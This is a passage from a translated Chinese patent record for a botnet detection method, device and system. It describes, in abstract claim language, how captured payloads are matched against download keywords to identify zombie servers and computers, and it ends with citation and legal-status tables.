7. The apparatus of claim 5, wherein the parsing obtaining unit comprises:
the first comparison subunit is configured to compare the attack behavior data with a predefined keyword of a malicious action execution code, and determine whether the attack behavior data includes the predefined keyword of the malicious action execution code;
and a payload determining subunit, configured to determine, if the predefined malicious action execution code keyword is contained, that the line or statement containing that keyword is the payload data.
8. The apparatus of claim 5, wherein the determining unit comprises:
a judging subunit, configured to judge, in the payload data, whether the number of occurrences of the same malicious program download source address sent by different computers is greater than a predetermined number of times;
and, if the number of occurrences of the same malicious program download source address sent by different computers is greater than the preset number, to determine the host corresponding to that download source address as a zombie server and the computer corresponding to the source IP that sent the download request as a zombie computer.
9. The botnet detection system is characterized by comprising data capture devices arranged at each node position in a detected network and data analysis servers connected with the data capture devices, wherein the data capture devices are used for acquiring attack behavior data transmitted at network nodes, and the data analysis servers are used for receiving the attack behavior data captured by the data capture devices at each node position, acquiring effective load payload data included in the attack behavior data, comparing the effective load payload data with predefined download keywords, and searching the download keywords included in the effective load payload data; according to the downloading keywords searched in the payload data, determining a source address of malicious program downloading corresponding to the downloading keywords and a source IP for sending a downloading request, and determining a computer in the botnet according to the source address and the source IP.
10. The system of claim 9, wherein the data capture device is a Web Application Firewall (WAF) system disposed at the network node.
11. The system according to claim 9, wherein the data analysis server is specifically configured to determine whether the number of occurrences of the same malicious program download source address sent by different computers is greater than a predetermined number of times in the payload data; if the times of occurrence of the same malicious program downloading source address sent by different computers are larger than the preset times, the host corresponding to the malicious program downloading source address is determined as a zombie server, and the computer corresponding to the source IP sending the corresponding downloading request is determined as a zombie computer.
12. A computer-readable storage medium, on which a computer program is stored which, when being executed by a processor, carries out the steps of the botnet detection method according to any one of claims 1-4.
CN201410027082.9A 2014-01-21 2014-01-21 Botnet detection method, device and system Active CN104796386B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201410027082.9A CN104796386B (en) 2014-01-21 2014-01-21 Botnet detection method, device and system

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN201410027082.9A CN104796386B (en) 2014-01-21 2014-01-21 Botnet detection method, device and system

Publications (2)

Publication Number Publication Date
CN104796386A CN104796386A (en) 2015-07-22
CN104796386B true CN104796386B (en) 2020-02-11

Family

ID=53560899

Family Applications (1)

Application Number Title Priority Date Filing Date
CN201410027082.9A Active CN104796386B (en) 2014-01-21 2014-01-21 Botnet detection method, device and system

Country Status (1)

Country Link
CN (1) CN104796386B (en)

Families Citing this family (4)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN107342967B (en) * 2016-05-03 2020-07-31 安碁资讯股份有限公司 Botnet detection system and method thereof
CN110119858A (en) * 2018-02-05 2019-08-13 南京易司拓电力科技股份有限公司 The Data Quality Assessment Methodology of automation system for the power network dispatching based on big data
CN109150871B (en) * 2018-08-14 2021-02-19 创新先进技术有限公司 Security detection method and device, electronic equipment and computer readable storage medium
CN110430199B (en) * 2019-08-08 2021-11-05 杭州安恒信息技术股份有限公司 Method and system for identifying internet of things botnet attack source

Citations (4)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN101360019A (en) * 2008-09-18 2009-02-04 华为技术有限公司 Detection method, system and apparatus of zombie network
CN101404658A (en) * 2008-10-31 2009-04-08 北京锐安科技有限公司 Method and system for detecting bot network
CN101588276A (en) * 2009-06-29 2009-11-25 成都市华为赛门铁克科技有限公司 A kind of method and device thereof that detects Botnet
CN101714931A (en) * 2009-11-26 2010-05-26 成都市华为赛门铁克科技有限公司 Early warning method, device and system of unknown malicious code

Also Published As

Publication number Publication date
CN104796386A (en) 2015-07-22

Legal Events

Date Code Title Description
C06 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant